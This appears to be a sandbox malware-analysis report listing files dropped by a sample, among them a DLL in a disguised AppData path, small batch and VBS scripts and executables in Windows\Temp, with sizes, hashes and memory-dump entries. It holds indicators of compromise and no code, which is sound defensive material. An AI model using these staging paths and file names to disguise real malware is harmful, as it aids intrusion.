566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll

Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\toncrypto.dll

Filesize
3.6MB

MD5
703f25116760b08f24401832edb0014f

SHA1
631bdb041296c58849648a447afd7046246747a1

SHA256
c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558

SHA512
566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b

Download Submit
C:\Windows\Temp\lol.bat

Filesize
62B

MD5
f95588de9545bb2369f424377a4c0289

SHA1
9e8e0876df2171cbca169e90965442f106cb0600

SHA256
70915616ff58efa0206685c04e9c3a1a02fc0a0e8a5396509552b1903d9c8097

SHA512
56d82f43863d181af70ce5b943ed9f23b1a18523cfc322cebce17a7f823ebf97420a2d38478fd4839bbcb1f9f659ad9bde965f7891e192b17dc4610e02b5b6f4

Download Submit
C:\Windows\Temp\lol.vbs

Filesize
105B

MD5
679e4f267798199cd7dd29975ab97d9e

SHA1
07fc118580a1ff2b25094a2a1534e5efabae6299

SHA256
f33133123be4a1106ecec05c26cf41169cb22683cc021326f28daed93da157ce

SHA512
f3f4484127786cc594c03fc06e31fcf89b2d0e4c2fe1a3697b73215780c2f6fab5979d9d889ec6f8b38381b1349fcb9b0dd022f9a83adc4ba465b4bcef42235d

Download Submit
C:\Windows\Temp\run.bat

Filesize
98B

MD5
731afe244b2414169a5f630d52646e56

SHA1
e3771ccdccd8c306ee5fc4f264cfc3310690458c

SHA256
6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

SHA512
84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

Download Submit
C:\Windows\Temp\s.exe

Filesize
1.7MB

MD5
c1fb795cc49ac04e860ea9b1abdba413

SHA1
7898657d19b5bb541c9befe310a31574b67d5181

SHA256
99f0bd0f9875da05cc5aec779bfa53e5b395131fa65e778321d29fa01cfab0ee

SHA512
851d085f1a41a02bc3060f22771afcff347918140863a7958f4c814808246697df8080a9142a4e494347fefa550f9fa338734e18917149e83939c21166309b73

Download Submit
C:\Windows\Temp\s.exe

Filesize
1.7MB

MD5
c1fb795cc49ac04e860ea9b1abdba413

SHA1
7898657d19b5bb541c9befe310a31574b67d5181

SHA256
99f0bd0f9875da05cc5aec779bfa53e5b395131fa65e778321d29fa01cfab0ee

SHA512
851d085f1a41a02bc3060f22771afcff347918140863a7958f4c814808246697df8080a9142a4e494347fefa550f9fa338734e18917149e83939c21166309b73

Download Submit
C:\Windows\Temp\setup.exe

Filesize
1017KB

MD5
6a63a4741f5d8561a08069dab3c9afbc

SHA1
4cceb4ccf7a1d488bc7a4b67ced920c7fcbec8a2

SHA256
5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e

SHA512
1afc1ec86a900827257b7fff7f2a598a0b35ef3f489a7ea11fe0d6a130335550ac6032a18e2c425429e06aae52ed89c84697ac9d12b3080cc2ee9b95b9ca9dab

Download Submit
C:\Windows\Temp\setup.exe

Filesize
1017KB

MD5
6a63a4741f5d8561a08069dab3c9afbc

SHA1
4cceb4ccf7a1d488bc7a4b67ced920c7fcbec8a2

SHA256
5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e

SHA512
1afc1ec86a900827257b7fff7f2a598a0b35ef3f489a7ea11fe0d6a130335550ac6032a18e2c425429e06aae52ed89c84697ac9d12b3080cc2ee9b95b9ca9dab

Download Submit
memory/448-157-0x0000000000400000-0x000000000048D000-memory.dmp

Filesize
564KB

Download
memory/448-158-0x0000000000400000-0x000000000048D000-memory.dmp

Filesize
564KB

Download
memory/448-165-0x0000000000400000-0x000000000048D000-memory.dmp

Filesize
564KB

Download
memory/448-155-0x0000000000400000-0x000000000048D000-memory.dmp

Filesize
564KB

Download
memory/2556-208-0x00007FFAA3DD0000-0x00007FFAA3DD1000-memory.dmp

Filesize
4KB

Download
memory/3044-182-0x000002A254B70000-0x000002A254B74000-memory.dmp

Filesize
16KB

Download
memory/3044-192-0x000002A254B77000-0x000002A254B7A000-memory.dmp

Filesize
12KB

Download
memory/3044-213-0x000002A254B71000-0x000002A254B77000-memory.dmp

Filesize
24KB

Download
memory/3044-174-0x000002A252A09000-0x000002A252A0F000-memory.dmp

Filesize
24KB

Download
memory/3044-214-0x000002A254B84000-0x000002A254B89000-memory.dmp

Filesize
20KB

Download
memory/3044-176-0x000002A254960000-0x000002A25496A000-memory.dmp

Filesize
40KB

Download
memory/3044-152-0x00007FFA87520000-0x00007FFA87FE1000-memory.dmp

Filesize
10.8MB

Download
memory/3044-154-0x000002A252A00000-0x000002A252A02000-memory.dmp

Filesize
8KB

Download
memory/3044-210-0x000002A252A0C000-0x000002A252A0E000-memory.dmp

Filesize
8KB

Download
memory/3044-211-0x000002A252A05000-0x000002A252A07000-memory.dmp

Filesize
8KB

Download
memory/3044-160-0x000002A252A03000-0x000002A252A05000-memory.dmp

Filesize
8KB

Download
memory/3044-161-0x000002A252A07000-0x000002A252A09000-memory.dmp

Filesize
8KB

Download
memory/3044-202-0x000002A254B7F000-0x000002A254B84000-memory.dmp

Filesize
20KB

Download
memory/3044-193-0x000002A254B7A000-0x000002A254B7F000-memory.dmp

Filesize
20KB

Download
memory/3044-191-0x000002A254B74000-0x000002A254B77000-memory.dmp

Filesize
12KB

Download
memory/3044-183-0x000002A254C90000-0x000002A254CA2000-memory.dmp

Filesize
72KB

Download
memory/3044-212-0x000002A254B80000-0x000002A254B83000-memory.dmp

Filesize
12KB

Download
memory/3044-163-0x000002A252A05000-0x000002A252A07000-memory.dmp

Filesize
8KB

Download
memory/3044-143-0x000002A2385A0000-0x000002A2385CA000-memory.dmp

Filesize
168KB

Download
memory/3280-186-0x000002B4F6516000-0x000002B4F6518000-memory.dmp

Filesize
8KB

Download
memory/3280-181-0x000002B4F6460000-0x000002B4F6482000-memory.dmp

Filesize
136KB

Download
memory/3280-178-0x00007FFA87520000-0x00007FFA87FE1000-memory.dmp

Filesize
10.8MB

Download
memory/3280-180-0x000002B4F6513000-0x000002B4F6515000-memory.dmp

Filesize
8KB

Download
memory/3280-179-0x000002B4F6510000-0x000002B4F6512000-memory.dmp

Filesize
8KB

Download
memory/4740-149-0x00000000004E0000-0x000000000066B000-memory.dmp

Filesize
1.5MB

Download
memory/4740-164-0x0000000076990000-0x0000000076F43000-memory.dmp

Filesize
5.7MB

Download
memory/4740-146-0x0000000000DF0000-0x0000000000E36000-memory.dmp

Filesize
280KB

Download
memory/4740-147-0x00000000004E0000-0x000000000066B000-memory.dmp

Filesize
1.5MB

Download
memory/4740-201-0x0000000005770000-0x00000000057D6000-memory.dmp

Filesize
408KB

Download
memory/4740-169-0x00000000053C0000-0x00000000053D2000-memory.dmp

Filesize
72KB

Download
memory/4740-150-0x00000000004E0000-0x000000000066B000-memory.dmp

Filesize
1.5MB

Download
memory/4740-151-0x0000000074FA0000-0x0000000075029000-memory.dmp

Filesize
548KB

Download
memory/4740-222-0x0000000006300000-0x0000000006376000-memory.dmp

Filesize
472KB

Download
memory/4740-223-0x0000000006420000-0x00000000064B2000-memory.dmp

Filesize
584KB

Download
memory/4740-153-0x00000000004E0000-0x000000000066B000-memory.dmp

Filesize
1.5MB

Download
memory/4740-226-0x0000000006A70000-0x0000000007014000-memory.dmp

Filesize
5.6MB

Download
memory/4740-136-0x00000000004E0000-0x000000000066B000-memory.dmp

Filesize
1.5MB

Download
memory/4740-167-0x0000000005A60000-0x0000000006078000-memory.dmp

Filesize
6.1MB

Download
memory/4740-237-0x0000000006700000-0x000000000671E000-memory.dmp

Filesize
120KB

Download
memory/4740-238-0x0000000000E60000-0x0000000000EB0000-memory.dmp

Filesize
320KB

Download
memory/4740-239-0x0000000007AD0000-0x0000000007C92000-memory.dmp

Filesize
1.8MB

Download
memory/4740-240-0x00000000081D0000-0x00000000086FC000-memory.dmp

Filesize
5.2MB

Download
memory/4740-142-0x0000000077100000-0x0000000077315000-memory.dmp

Filesize
2.1MB

Download
memory/4740-139-0x00000000004E0000-0x000000000066B000-memory.dmp

Filesize
1.5MB

Download
memory/4740-171-0x0000000005550000-0x000000000565A000-memory.dmp

Filesize
1.0MB

Download
memory/4740-177-0x0000000075A40000-0x0000000075A8C000-memory.dmp

Filesize
304KB

Download
memory/4740-140-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/4740-175-0x0000000005480000-0x00000000054BC000-memory.dmp

Filesize
240KB

Download